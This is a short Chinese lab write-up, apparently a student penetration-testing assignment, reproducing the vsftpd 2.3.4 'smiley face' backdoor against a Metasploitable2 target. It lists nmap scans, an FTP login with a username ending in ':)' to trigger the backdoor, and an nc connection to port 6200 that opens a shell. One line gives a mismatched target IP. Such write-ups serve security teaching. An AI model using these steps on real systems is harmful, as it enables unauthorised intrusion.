网络渗透测试作业:笑脸漏洞复现
作者:互联网
笑脸漏洞复现
工具:
攻击机:kali 192.168.79.128
靶机:Metasplotable2-Linux 192.168.79.131
复现过程
打开 kali 终端,执行以下命令:nmap 主机IP/24
发现靶机 (192.168.118.131) 打开着 21 端口
输入命令:nmap -sV 靶机IP
可以看到靶机的ftp服务的版本信息是vsftpd 2.3.4,存在漏洞
输入命令:ftp 192.168.79.131 21
用户名: root:)//‘:)’ 是笑脸漏洞的触发条件
密码:123456 可以随意设置
执行命令:nmap -p 6200 192.168.79.131发现靶机打开了6200端口及后门
通过命令:nc 192.168.79.131 6200 连接这个端口
成功连接变建立了后门shell,可以开始执行命令
标签:nmap,笑脸,192.168,漏洞,6200,复现,靶机,79.131 来源: https://blog.csdn.net/m0_62826547/article/details/121917166